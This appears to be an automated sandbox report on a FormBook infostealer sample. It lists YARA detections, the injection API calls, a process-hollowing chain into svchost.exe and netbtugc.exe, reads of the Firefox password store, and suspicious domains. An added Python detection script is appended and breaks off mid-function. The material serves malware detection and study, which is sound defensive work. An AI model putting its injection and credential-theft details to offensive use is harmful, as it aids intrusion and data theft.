            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3782139985.0000000004ADA000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.00000000048AA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?zh=mxnR
            Source: netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.3784325817.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3782139985.000000000416E000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00806B0C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00806D07
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_00806B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00806B0C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_007F2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007F2B37
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: 0_2_0081F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0081F7FF

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exeCode function: This is a third-party compiled AutoIt script.0_2_007B3D19
            Source: Certificate 11-19AIS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 11-19AIS.exe, 00000000.00000000.1292684977.000000000085E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_baed096a-2
            Source: Certificate 11-19AIS.exe, 00000000.00000000.1292684977.000000000085E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: ~SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f07caf1b-0
            Source: Certificate 11-19AIS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_af8e7d42-f
            Source: Certificate 11-19AIS.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d1832ecc-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B60 NtClose,LdrInitializeThunk,2_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,2_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474340 NtSetContextThread,2_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03474650 NtSuspendThread,2_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BE0 NtQueryValueKey,2_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BF0 NtAllocateVirtualMemory,2_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472B80 NtQueryInformationFile,2_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472BA0 NtEnumerateValueKey,2_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AD0 NtReadFile,2_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03472CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03473010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03473090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_034739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03473D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03473D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF4340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF4650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF3090 NtSetValueKey
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF3010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF3D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02FF3D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02837A70 NtReadFile
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02837BE0 NtClose
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02837B50 NtDeleteFile
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02837920 NtCreateFile
            Source: C:\Windows\SysWOW64\netbtugc.exe; Code function: 4_2_02837D30 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe; Code function: 0_2_007F6606: CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe; Code function: 0_2_007EACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe; Code function: 0_2_007F79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: Certificate 11-19AIS.exe, 00000000.00000003.1314591287.0000000003803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-19AIS.exe
            Source: Certificate 11-19AIS.exe, 00000000.00000003.1314740603.00000000039AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-19AIS.exe
            Source: Certificate 11-19AIS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FCE7A GetLastError,FormatMessageW, 0_2_007FCE7A
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007EAB84 AdjustTokenPrivileges,CloseHandle, 0_2_007EAB84
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007EB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_007EB134
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007FE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_007FE1FD
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007F6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_007F6532
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_0080C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_0080C18C
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Code function: 0_2_007B406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_007B406B
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | File created: C:\Users\user\AppData\Local\Temp\autBBDF.tmp
            Source: Certificate 11-19AIS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000004.00000002.3776112621.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002B90000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1652002550.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1654002806.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3776112621.0000000002BE1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 11-19AIS.exe | ReversingLabs: Detection: 71%
            Source: unknown | Process created: C:\Users\user\Desktop\Certificate 11-19AIS.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"
            Source: C:\Users\user\Desktop\Certificate 11-19AIS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-19AIS.exe"
            Source: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
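The process-creation rows above carry the two strongest host-side signals in this report: a SysWOW64 copy of svchost.exe whose command line names the dropper ("C:\Users\user\Desktop\Certificate 11-19AIS.exe"), which is what a process started suspended and hollowed looks like, and system binaries (svchost.exe, netbtugc.exe) whose parents live on the Desktop or under a random Program Files (x86) folder. The following is an added example, not part of the Joe Sandbox report or of FormBook: it runs those two checks over constructed Sysmon-style Event ID 1 records and reconstructs the parent chain. The pids, the explorer.exe parent of the dropper, and the record layout are assumptions; the image paths and command lines are the ones the report prints.

```python
import ntpath
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    """Constructed process-creation record (Sysmon Event ID 1 fields, subset)."""
    pid: int
    ppid: int
    image: str          # full path of the image mapped into the new process
    command_line: str   # command line observed at creation time
    parent_image: str   # full path of the parent's image ("" if not observed)


SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def first_token(command_line: str) -> str:
    """Return the program named in a Windows command line (quoted or bare)."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def basename_lower(path: str) -> str:
    return ntpath.basename(path).lower()


def image_commandline_mismatch(ev: ProcEvent) -> bool:
    """Hollowing indicator: the mapped image is not the program the command line names."""
    return basename_lower(ev.image) != basename_lower(first_token(ev.command_line))


def system_binary_with_foreign_parent(ev: ProcEvent) -> bool:
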